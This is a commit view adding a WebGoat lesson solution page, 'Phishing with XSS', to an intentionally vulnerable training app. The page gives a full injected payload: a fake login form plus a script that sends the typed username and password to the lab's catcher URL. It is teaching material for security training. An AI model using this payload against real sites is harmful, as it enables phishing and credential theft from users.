Restructured the baseline to remove extra src/main directory structure. Added eclipes project file
git-svn-id: http://webgoat.googlecode.com/svn/branches/webgoat-6.0@485 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
69
webapp/lesson_solutions/Phishing.html
Normal file
69
webapp/lesson_solutions/Phishing.html
Normal file
@ -0,0 +1,69 @@
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|
||||
<title>Phising with XSS</title>
|
||||
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
|
||||
</head>
|
||||
<body>
|
||||
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
|
||||
|
||||
<p><b>Concept / Topic To Teach:</b><br/>
|
||||
It is always a good practice to validate all input on the
|
||||
server side. XSS can occur when unvalidated user input is used
|
||||
in an HTTP response. With the help of XSS you can do a Phishing
|
||||
Attack and add content to a page which looks official. It is very
|
||||
hard for a victim to determinate that the content is malicious.
|
||||
</p>
|
||||
|
||||
<p><b>General Goal(s):</b><br/>
|
||||
The user should be able to add a form asking for username
|
||||
and password. On submit the input should be sent to
|
||||
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
||||
</p>
|
||||
|
||||
<b>Solution:</b><br/>
|
||||
With XSS it is possible to add further elements to an existing Page.
|
||||
This solution consists of two parts you have to combine:
|
||||
<ul>
|
||||
<li>A form the victim has to fill in</li>
|
||||
<li>A script which reads the form and sends the gathered information to the attacker</li>
|
||||
</ul>
|
||||
A Form with username and password could look like this:<br/>
|
||||
<p>
|
||||
</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
||||
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
|
||||
name = "pass"><br></form><br><br><HR>
|
||||
<br/><br/>Search for this term and you will see that a form is added to the page since the search field accepts HTML.
|
||||
<br/>The initial </form> tag is to terminate the original search form.
|
||||
</p>
|
||||
Now you need a script:
|
||||
<p>
|
||||
<script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
||||
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
||||
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
||||
</script>
|
||||
</p>
|
||||
<p>
|
||||
This script will read the input from the form and send it to the catcher of WebGoat.<br/>
|
||||
The text <font color="blue">in blue</font> should match what is in your address bar. If you are using ports and/or webscarab, it may be different.<br/>
|
||||
The last step is to put things together. Add a Button to the form which
|
||||
calls the script. You can reach this with the onclick="myFunction()" handler:
|
||||
</p>
|
||||
<p>
|
||||
<input type="submit" name="login" value="login" onclick="hack()">
|
||||
<p>
|
||||
The final String looks like this:<br/>
|
||||
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
||||
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
||||
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
||||
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
||||
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
|
||||
name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
|
||||
</p>
|
||||
Search for this String and you will see a form asking for your username and password.
|
||||
Fill in these fields and click on the Login Button, which completes the lesson.<br/><br/>
|
||||
<img src="lesson_solutions/Phishing_files/image001.jpg"><br/>
|
||||
<font size="2"><b>New login field after submitting the script.</b></font><br/><br/><br/>
|
||||
</body>
|
||||
</html>
|
||||
|
Reference in New Issue
Block a user